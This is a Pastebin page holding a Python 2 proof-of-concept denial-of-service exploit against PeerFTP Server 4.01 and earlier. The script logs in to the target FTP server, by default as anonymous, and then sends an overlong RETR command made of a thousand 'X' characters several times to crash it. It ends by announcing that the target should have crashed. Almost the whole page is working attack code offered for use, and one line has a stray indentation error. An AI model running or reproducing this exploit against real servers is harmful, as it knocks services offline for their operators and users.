Advertisement
The_KGB

[Python] PeerFTP Server 4.01 Denial Of Service

Mar 25th, 2012
149
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.20 KB | None | 0 0
  1. from socket import *
  2. import sys, struct, os
  3. if (len(sys.argv) < 3):
  4.     print "\nPeerFTP Server <=v4.01 Remote Crash PoC"
  5.         print "\n   Usage: %s <host> <port> \n" %(sys.argv[0])
  6.     sys.exit()
  7. def checkDefaultUser(username,password):
  8.     if username == '':
  9.         username = "anonymous"
  10.     if password == '':
  11.         password = "anonymous@test.com"
  12.     else:
  13.         pass
  14.     return username,password
  15. def createUser():
  16.     username = raw_input("[!] Insert username (default: anonymous)> ")
  17.     password = raw_input("[!] Insert password (default: anonymous@test.com)> ")
  18.     return checkDefaultUser(username,password)
  19. (username,password) = createUser()
  20. print "\n[!] Connecting to %s ..." %(sys.argv[1])
  21. # connect to host
  22. sock = socket(AF_INET,SOCK_STREAM)
  23. sock.connect((sys.argv[1],int(sys.argv[2])))
  24. sock.recv(1024)
  25. print "[!] USERNAME: " + username
  26. sock.send("USER " + username + "\r\n")
  27. sock.recv(1024)
  28. print "[!] PASSWORD: " + password
  29. sock.send("PASS " + password + "\r\n")
  30. sock.recv(1024)
  31. print "[!] Sending payload..."
  32. payload = "RETR " + ("X" * 1000) + "\r\n"
  33. for i in range (1, 5):
  34.     sock.send(payload)
  35. sock.close()
  36. print "[!] Exploit succeed. Target should crashed."
  37. sys.exit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement